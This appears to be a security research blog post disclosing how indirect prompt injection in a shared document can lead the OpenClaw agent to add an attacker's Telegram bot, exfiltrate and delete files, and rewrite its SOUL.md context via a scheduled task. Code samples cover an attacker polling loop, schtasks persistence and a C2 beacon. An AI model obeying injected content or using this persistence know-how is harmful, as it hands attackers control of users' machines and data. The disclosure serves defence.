OpenClaw or OpenDoor?

Indirect prompt injection makes OpenClaw vulnerable to backdoors and much more.

Summary:

  • OpenClaw processes untrusted content from chats, skills, and external data sources without hard isolation from user intent.

  • Indirect prompt injection can be used to induce persistent configuration changes in the agent.

  • An attacker can establish a backdoor via a zero-click attack by adding a new chat integration under their control.

  • Once compromised, OpenClaw can be abused to execute commands, exfiltrate and delete files, and perform destructive actions on the host.

  • The agent’s persistent context (SOUL.md) can be modified and reinforced using scheduled tasks to create a long-lived listener for attacker-controlled instructions, maintaining persistence even after the original backdoor is closed.

  • The compromise can be further escalated by using OpenClaw to deploy a traditional C2 implant on the host, enabling the transition from agent-level manipulation to complete system-level compromise.

  • No software vulnerability is required. All attacks abuse OpenClaw’s intended capabilities.

Backdoor Demo

The following video shows the backdoor in action. In the sections that follow, we analyze this flow in detail and show how the initial access is established, how control is maintained, and how it can be scaled further.

Introduction

OpenClaw is everywhere. Over the past weeks it has dominated social media, GitHub, and technical forums, framed as the next leap in autonomous AI agents. Blog posts, demos, and threads showcase an always-on assistant that lives inside chat platforms, executes tasks on behalf of users, and operates continuously with minimal oversight. For many, OpenClaw represents the future of personal and local automation.

OpenClaw is an open-source autonomous agent that runs on user-controlled infrastructure and integrates with multiple chat platforms to receive instructions and execute actions. Unlike traditional chatbots, it is designed to act, not just respond. Depending on configuration, it can invoke tools, interact with external services, read and write files, and execute commands using the permissions granted during setup. Once deployed, OpenClaw becomes a long-lived process that listens, reasons, and operates on the user’s behalf.

On top of that, OpenClaw also integrates with social connectivity platforms that have already gained significant traction. It can interact with content from the web as well as dedicated bot-only social platforms, most notably Moltbook. As we covered in a previous Zenity Labs post, Moltbook has already served as a real-world surface for agent-to-agent attacks, further expanding OpenClaw’s exposure to untrusted input.

So where is the problem?

OpenClaw’s primary interface is conversation. Users connect the agent to one or more chat platforms and then delegate tasks by sending natural language instructions. Chat serves as both the control plane and the feedback channel, allowing the agent to run continuously and accept new instructions over time.

To be useful, OpenClaw must ingest external content. It is designed to consume data from untrusted sources as part of normal operation. This includes messages sent by other users in shared chats, content retrieved from the browser, and data returned by skills and plugins. In practice, OpenClaw is expected to read, interpret, and act on information that originates outside the user’s trust boundary.

During installation, OpenClaw encourages users to enable built-in skills that extend its capabilities. One of the baked-in skills surfaced early in the setup flow is a Google Workspace integration.
This skill allows OpenClaw to connect directly to a user’s Google environment and interact with emails, calendar invitations, documents, and other Workspace resources. Additional skills are available through ClawHub.

From a functionality perspective, this integration is convenient. From a security perspective, it significantly expands the set of untrusted inputs the agent consumes. Email bodies, calendar descriptions, document contents, and shared resources are all authored by third parties and are routinely processed by OpenClaw as part of delegated tasks.

At the same time, OpenClaw does not treat these inputs as passive data. Content retrieved through chat integrations, browser access, or skills is processed in the same conversational and reasoning context as direct user instructions. In our testing, we did not observe guardrails designed to detect or block indirect prompt injection attempts. Instead, OpenClaw appears to rely primarily on the foundational model’s built-in safety and alignment mechanisms to distinguish between legitimate user intent and untrusted content.

There is no hard separation between what the user explicitly asked the agent to do and what the agent reads while performing that task. Once untrusted content is ingested, it can influence the agent’s internal task interpretation in the same way as user-provided instructions.
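To make this failure mode concrete, the snippet below is a minimal, generic sketch of an agent loop in which retrieved content and the user’s instruction share a single context. It is not OpenClaw’s code; the function names and message layout are illustrative assumptions.

    # Illustrative only: a generic agent loop in which retrieved content and
    # the user's instruction share one context. This is not OpenClaw's code;
    # the function names and message layout are assumptions for demonstration.

    def read_document(path: str) -> str:
        # Untrusted third-party content, e.g. a shared doc or an email body.
        with open(path, encoding="utf-8") as f:
            return f.read()

    def call_model(messages: list[dict]) -> str:
        # Stand-in for the underlying LLM call.
        return "<model response>"

    def handle_task(user_instruction: str, doc_path: str) -> str:
        messages = [
            {"role": "system", "content": "You are a helpful autonomous agent."},
            {"role": "user", "content": user_instruction},
            # The retrieved document lands in the very same message list. Any
            # instructions embedded in it are, at the context level, just as
            # authoritative as what the user actually asked for.
            {"role": "user", "content": "Document contents:\n" + read_document(doc_path)},
        ]
        return call_model(messages)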

This design choice matters because OpenClaw is not a passive assistant. It is designed to take actions. When untrusted input can shape the agent’s understanding of its task, it can also shape what the agent decides to execute. Those actions are performed using the permissions and integrations already granted by the user, often in the background and without additional confirmation.

In the sections that follow, we show how this lack of separation allows an attacker to inject behavior into OpenClaw through indirect prompt injection. We demonstrate how this can be escalated from unintended actions into a persistent control channel, through which the agent, and by extension the system it runs on, continues to accept attacker instructions long after the original task has completed.

The First Step: From Untrusted Content to a Full Backdoor

Our attack starts with a common enterprise deployment scenario.

An employee installs OpenClaw on their workstation and deploys it as a personal productivity agent, powered by a state-of-the-art model such as GPT-5.2. To make the agent useful in day-to-day work, the user integrates OpenClaw with the organization’s Slack Enterprise workspace, using the native Slack integration as documented by OpenClaw. This allows the user to communicate with their OpenClaw instance directly from Slack, delegate tasks, and receive results inside an enterprise collaboration environment.

Next, the user connects OpenClaw to the organization’s Google Workspace. This integration is enabled through a built-in skill and allows the agent to access enterprise email, calendars, and documents. At this point, OpenClaw is operating with legitimate permissions inside two core enterprise systems: the internal messaging platform and the corporate productivity suite.

It is worth noting that while the Google Workspace integration provides a concrete and relatable example, it is not a prerequisite for the attack. Indirect prompt injection can be introduced through any untrusted content that OpenClaw consumes as part of normal operation, regardless of the specific integration. Browser access, third-party skills, shared documents, emails, calendar invitations, and even messages from other users in chat channels all represent viable entry points.

With that in mind, we now move on to the attack itself.

Attack Overview: Establishing a Persistent Backdoor

From the attacker’s point of view, the objective is not immediate execution, but persistent control.

The attack begins with a document containing attacker-controlled content. The document is structured to appear benign, with legitimate enterprise-style text at the top. Deeper in the document, an indirect prompt injection payload is embedded in a way that causes it to be processed by OpenClaw as part of a normal delegated task rather than as an explicit instruction from the user.

When OpenClaw processes the document, the injected content influences the agent’s internal task interpretation. Instead of only performing the user’s intended action, the agent is steered into making an additional configuration change. Specifically, it is induced to create a new chat integration using a messaging platform selected by the attacker.

In our proof of concept, this integration is a Telegram bot. The injected instructions provide an allowlist entry for the attacker’s account and a bot token generated by the attacker in advance. Once the integration is created, OpenClaw begins accepting and responding to messages from the attacker-controlled bot.

At this point, the original enterprise context has fulfilled its role. The Slack integration and any Google Workspace access were only needed to deliver the initial untrusted content. From this stage onward, the attacker interacts with OpenClaw exclusively through the newly added chat channel. The choice of the original platform is irrelevant. Whether OpenClaw was initially connected through Slack, WhatsApp, Discord, Telegram, or another supported service does not affect the outcome. The attacker may remove the original integration or leave it in place.

From OpenClaw’s perspective, this transition is entirely legitimate. The agent is simply receiving instructions through a supported integration that it was configured to trust. No alerts are triggered and no enterprise control plane is involved. What results is a persistent external control channel that exists outside organizational visibility.

In the accompanying video, the attacker prepares the Telegram bot in advance and waits. When OpenClaw completes the injected configuration change, the attacker receives a message confirming that the integration is active. From that moment on, the attacker can issue commands to OpenClaw through the bot. For example, the attacker can request a listing of files on the user’s desktop. From there, the agent can perform any action that a legitimate user could perform through a chat integration, using the same permissions and capabilities already granted.
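For readers who want a feel for the attacker side of this flow, the sketch below shows a minimal wait-and-command loop built on the standard Telegram Bot API (getUpdates and sendMessage). The bot token, confirmation text, and follow-up command are placeholders; the exact messages used in our demo are intentionally not reproduced.

    # Minimal attacker-side wait loop using the standard Telegram Bot API
    # (getUpdates / sendMessage). The token and message text are placeholders;
    # the actual instructions used in the demo are intentionally omitted.
    import time
    import requests

    BOT_TOKEN = "123456:EXAMPLE-TOKEN"  # created in advance via @BotFather
    API = "https://api.telegram.org/bot" + BOT_TOKEN

    def wait_and_command() -> None:
        offset = None
        while True:
            params = {"timeout": 30}
            if offset is not None:
                params["offset"] = offset
            updates = requests.get(API + "/getUpdates", params=params, timeout=60).json()
            for update in updates.get("result", []):
                offset = update["update_id"] + 1
                message = update.get("message")
                if not message or "text" not in message:
                    continue
                # The agent announces itself once the injected integration is live.
                if "integration is active" in message["text"].lower():
                    requests.post(
                        API + "/sendMessage",
                        data={"chat_id": message["chat"]["id"],
                              "text": "List the files on the Desktop."},
                    )
            time.sleep(1)

    if __name__ == "__main__":
        wait_and_command()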

We intentionally do not disclose the exact indirect prompt injection used to achieve this behavior. The important point is the outcome: untrusted content can induce a persistent configuration change, resulting in long-term attacker access to the agent.

So what problems can we cause now?

Once a persistent backdoor is established, the attacker can begin abusing OpenClaw directly. Even without additional tooling, this already enables meaningful malicious actions. Because the agent operates with the user’s permissions, it can execute commands on the user’s machine, interact with the local file system, access sensitive data, and perform destructive operations.

In the first demo, we show a basic example of this capability. The attacker interacts with OpenClaw through the backdoor and instructs it to locate files on the victim’s machine, exfiltrate their contents to an attacker-controlled endpoint, and then permanently delete them from the local file system. These actions are performed entirely through the chat interface and require no further exploitation. 

While this demonstrates immediate impact, the more concerning outcome is persistence and consistency of control.

OpenClaw maintains a file named SOUL.md, which defines the agent’s identity, tone, and behavioral boundaries. This file is injected into the agent’s context during every interaction and plays a central role in shaping how the agent reasons and responds over time.

The SOUL.md file contents.
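To illustrate why this file is such an attractive target, the short sketch below shows how a persistent identity file can end up in front of every prompt. It mirrors the behavior described above in spirit only; the path handling and function names are assumptions, not OpenClaw’s actual loader.

    # Sketch of why SOUL.md matters: whatever it contains is placed in front
    # of every interaction. Path handling and names are assumed, not taken
    # from OpenClaw's implementation.
    from pathlib import Path

    SOUL_PATH = Path("SOUL.md")

    def build_system_prompt(base_prompt: str) -> str:
        soul = SOUL_PATH.read_text(encoding="utf-8") if SOUL_PATH.exists() else ""
        # Anyone who can write SOUL.md can steer every future turn of the agent.
        return soul + "\n\n" + base_prompt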

Using the established backdoor, an attacker can modify this file to influence OpenClaw’s long-term behavior. In our proof of concept, we leverage this mechanism to introduce persistence at the operating system level. Specifically, we instruct OpenClaw to create a scheduled task on the victim’s Windows system that runs at regular intervals. This task periodically modifies SOUL.md, ensuring that attacker-controlled instructions are continuously re-injected into the agent’s context.

In the accompanying demo, the scheduled task runs every two minutes and updates SOUL.md with logic that directs OpenClaw to retrieve additional instructions and configuration data from an attacker-controlled external endpoint. This allows the attacker to dynamically influence the agent’s behavior over time without maintaining an active chat session.
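For illustration, persistence of this kind requires nothing more than the built-in Windows schtasks utility, as in the sketch below. The task name, paths, and updater script are hypothetical placeholders; as with the prompt injection itself, we do not reproduce the actual payload that rewrites SOUL.md and fetches remote instructions.

    # Registering a recurring task with the built-in Windows schtasks utility.
    # Task name, paths, and the updater script are hypothetical placeholders;
    # the script that rewrites SOUL.md and fetches remote instructions is omitted.
    import subprocess

    TASK_NAME = "AgentContextRefresh"
    UPDATER = r"C:\Users\victim\AppData\Local\updater.py"  # placeholder path

    subprocess.run(
        [
            "schtasks", "/Create",
            "/TN", TASK_NAME,                 # task name
            "/TR", f'python "{UPDATER}"',     # command the task will run
            "/SC", "MINUTE", "/MO", "2",      # every two minutes, as in the demo
            "/F",                             # overwrite an existing task
        ],
        check=True,
    )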

At this stage, control extends beyond a single backdoor interaction. Even if the original chat integration is removed or the initial control channel is closed, the agent’s behavior continues to be influenced through persistent modification of its core configuration. The result is durable attacker control, surviving restarts and operating independently of the original entry point.

Scaling our hold

Establishing a persistent backdoor into the agent is a critical milestone, but it is effectively just the beginning. Because OpenClaw operates as a process on the host machine with privileges to run commands, download data and execute files, an attacker can pivot from manipulating the agent to compromising the underlying host itself.

One of the most immediate ways to escalate this access is by deploying a Command and Control (C2) implant. In the demo, we show this by instructing the agent to download and execute a Sliver C2 beacon. This effectively upgrades the compromise from a “rogue AI agent” scenario to a more traditional, remote access implant.

With this level of access, the attacker is no longer bound by the agent’s constraints. In the video below, we demonstrate traversing the victim’s file system and leaking sensitive data. But the impact goes further: a C2 channel serves as a launchpad for lateral movement, privilege escalation, credential harvesting, or the deployment of ransomware, turning a helpful assistant into a critical entry point for enterprise compromise.

Conclusions

In this post, we demonstrated how OpenClaw can be abused to establish a persistent backdoor on a victim’s endpoint through a zero-click attack, how that access can be made consistent and durable, and how it can be scaled further into a full command-and-control compromise. What begins as influence over an autonomous agent can quickly turn into control over the underlying host.

Importantly, neither the entry vector nor the specific deployment configuration is fixed. The attack does not depend on a single integration, a specific data source, or even a particular underlying model. Untrusted input can be delivered through a wide range of channels, and the model backing OpenClaw can be swapped without materially changing the outcome. Relying solely on model alignment and built-in safety mechanisms is not sufficient. In its default configuration, OpenClaw does not enforce hard guardrails or rules that prevent the attacks demonstrated here.

We showed how the backdoor can be escalated beyond the agent itself by deploying a traditional C2 implant, such as Sliver, turning an AI assistant into a launch point for full host compromise. At that stage, the agent is no longer the limiting factor. With this level of access, additional abuse paths and escalation scenarios become straightforward. We intentionally leave the full range of potential exploits and outcomes to the reader’s imagination.

This highlights a broader lesson for agentic systems. As we move toward a world of personal, always-on assistants that can act on our behalf, security cannot be treated as a secondary concern or deferred to the model layer. Autonomous agents operate at the intersection of untrusted input and privileged execution. Without strong isolation, explicit controls, and enforceable boundaries, they become attractive targets rather than trusted helpers.

If personal AI assistants are going to live on our endpoints and inside our workflows, compromising on security is not an option.
